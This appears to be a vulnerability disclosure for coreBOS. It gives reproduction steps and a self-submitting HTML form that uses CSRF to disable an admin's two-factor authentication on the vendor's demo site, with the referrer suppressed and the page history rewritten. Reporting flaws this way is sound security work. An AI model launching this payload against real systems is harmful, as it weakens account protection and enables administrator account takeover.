The attacker can turn off the 2FA of the admin by performing the CSRF attack
Step 1: Login as admin on the demo product and navigate to https://demo.corebos.com/index.php?module=Utilities&action=integration&_op=getconfig2fa&user_list=1
Step 2: Turn on the 2FA and close the tab
Step 3: Reopen the account 2fa section –> and verify it’s still on
Step 4: Close the Tab again
Step 5: Open w3schools –> HTML editor on new tab
Step 6: Copy this code and Run
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.corebos.com/index.php">
<meta name="referrer" content="no-referrer">
<input type="hidden" name="module" value="Utilities" />
<input type="hidden" name="action" value="integration" />
<input type="hidden" name="_op" value="setconfig2fa" />
<input type="hidden" name="user_list" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Step 7: Done
Successfully launched CSRF attack & 2FA of Admin turned off!